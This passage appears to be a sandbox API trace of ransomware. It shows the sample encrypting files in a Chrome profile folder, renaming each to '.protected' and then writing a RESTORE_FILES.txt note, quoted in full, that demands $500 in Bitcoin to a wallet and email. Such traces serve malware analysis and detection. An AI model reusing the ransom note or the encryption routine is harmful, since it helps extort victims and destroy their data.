[0078.479] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.479] lstrcmpiW (lpString1="000003.log", lpString2="Windows") returned -1 [0078.479] lstrcmpiW (lpString1="000003.log", lpString2="Program Files") returned -1 [0078.479] lstrcmpiW (lpString1="000003.log", lpString2="Program Files (x86)") returned -1 [0078.479] lstrcmpiW (lpString1="000003.log", lpString2="$Recycle.bin") returned 1 [0078.479] lstrcmpiW (lpString1="000003.log", lpString2="System Volume Information") returned 
-1 [0078.479] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log") returned 106 [0078.479] StrStrIW (lpFirst="000003.log", lpSrch=".protected") returned 0x0 [0078.479] lstrcmpW (lpString1="000003.log", lpString2="RESTORE_FILES.txt") returned -1 [0078.479] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.479] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log") returned 106 [0078.480] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0078.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log") returned 106 [0078.480] StrStrW (lpFirst="000003.log", lpSrch=".rar") returned 0x0 [0078.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log") returned 106 [0078.480] StrStrW (lpFirst="000003.log", lpSrch=".zip") returned 0x0 [0078.480] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 
| out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x156, lpOverlapped=0x0) returned 1 [0078.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffeaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.481] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x156, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x156, lpOverlapped=0x0) returned 1 [0078.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.481] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.481] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.481] CloseHandle (hObject=0x158) returned 1 [0078.481] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.protected") returned 116 [0078.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log.protected")) returned 1 [0078.482] 
FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.482] lstrcmpiW (lpString1="CURRENT", lpString2="Windows") returned -1 [0078.482] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files") returned -1 [0078.482] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files (x86)") returned -1 [0078.482] lstrcmpiW (lpString1="CURRENT", lpString2="$Recycle.bin") returned 1 [0078.482] lstrcmpiW (lpString1="CURRENT", lpString2="System Volume Information") returned -1 [0078.482] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT") returned 103 [0078.482] StrStrIW (lpFirst="CURRENT", lpSrch=".protected") returned 0x0 [0078.482] lstrcmpW (lpString1="CURRENT", lpString2="RESTORE_FILES.txt") returned -1 [0078.482] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.482] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.482] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT") returned 103 [0078.482] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0078.482] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT") returned 103 [0078.482] StrStrW (lpFirst="CURRENT", lpSrch=".rar") returned 0x0 [0078.482] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT") returned 103 [0078.482] StrStrW (lpFirst="CURRENT", lpSrch=".zip") returned 0x0 [0078.482] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.483] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.483] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.483] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.483] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.483] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.484] CloseHandle (hObject=0x158) returned 1 [0078.484] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT.protected") returned 113 [0078.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current.protected")) returned 1 [0078.484] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.484] lstrcmpiW (lpString1="LOCK", lpString2="Windows") returned -1 [0078.484] lstrcmpiW (lpString1="LOCK", lpString2="Program Files") returned -1 [0078.484] lstrcmpiW (lpString1="LOCK", lpString2="Program Files (x86)") returned -1 [0078.484] lstrcmpiW (lpString1="LOCK", lpString2="$Recycle.bin") returned 1 [0078.484] lstrcmpiW (lpString1="LOCK", lpString2="System Volume Information") returned -1 [0078.484] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK") returned 100 [0078.484] StrStrIW (lpFirst="LOCK", lpSrch=".protected") returned 0x0 [0078.484] lstrcmpW (lpString1="LOCK", lpString2="RESTORE_FILES.txt") returned -1 [0078.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\lock"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.486] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK") returned 100 [0078.486] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0078.486] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK") returned 100 [0078.486] StrStrW (lpFirst="LOCK", lpSrch=".rar") returned 0x0 [0078.486] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK") returned 100 [0078.486] StrStrW (lpFirst="LOCK", lpSrch=".zip") returned 0x0 [0078.486] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.486] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.486] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.486] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.486] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.487] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.487] CloseHandle (hObject=0x158) returned 1 [0078.487] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK.protected") returned 110 [0078.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\lock.protected")) returned 1 [0078.487] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.487] lstrcmpiW (lpString1="LOG", lpString2="Windows") returned -1 [0078.488] lstrcmpiW (lpString1="LOG", lpString2="Program Files") returned -1 [0078.488] lstrcmpiW (lpString1="LOG", lpString2="Program Files (x86)") returned -1 [0078.488] lstrcmpiW (lpString1="LOG", lpString2="$Recycle.bin") returned 1 [0078.488] lstrcmpiW (lpString1="LOG", lpString2="System Volume Information") returned -1 [0078.488] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG") returned 99 [0078.488] StrStrIW (lpFirst="LOG", lpSrch=".protected") returned 0x0 [0078.488] lstrcmpW (lpString1="LOG", lpString2="RESTORE_FILES.txt") returned -1 [0078.488] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.488] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.489] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG") returned 99 [0078.489] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0078.489] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG") returned 99 [0078.489] StrStrW (lpFirst="LOG", lpSrch=".rar") returned 0x0 [0078.489] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG") returned 99 [0078.489] StrStrW (lpFirst="LOG", lpSrch=".zip") returned 0x0 [0078.489] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x9a, lpOverlapped=0x0) returned 1 [0078.490] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.490] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x9a, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x9a, lpOverlapped=0x0) returned 1 [0078.490] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 
[0078.490] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.490] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.490] CloseHandle (hObject=0x158) returned 1 [0078.490] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.protected") returned 109 [0078.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.protected")) returned 1 [0078.491] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.491] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Windows") returned -1 [0078.491] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files") returned -1 [0078.491] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files (x86)") returned -1 [0078.491] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="$Recycle.bin") returned 1 [0078.491] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="System Volume Information") returned -1 [0078.491] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001") returned 111 [0078.491] StrStrIW (lpFirst="MANIFEST-000001", lpSrch=".protected") returned 0x0 [0078.491] lstrcmpW (lpString1="MANIFEST-000001", lpString2="RESTORE_FILES.txt") returned -1 [0078.491] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.491] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.491] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001") returned 111 [0078.491] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0078.491] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001") returned 111 [0078.491] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".rar") returned 0x0 [0078.491] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001") returned 111 [0078.491] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".zip") returned 0x0 [0078.492] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 
lpNumberOfBytesRead=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.493] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.493] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.493] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.493] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.493] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.493] CloseHandle (hObject=0x158) returned 1 [0078.493] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001.protected") returned 121 [0078.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\manifest-000001.protected")) returned 1 [0078.494] 
FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.494] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.494] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\RESTORE_FILES.txt") returned 113 [0078.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.494] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.494] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.495] lstrlenA 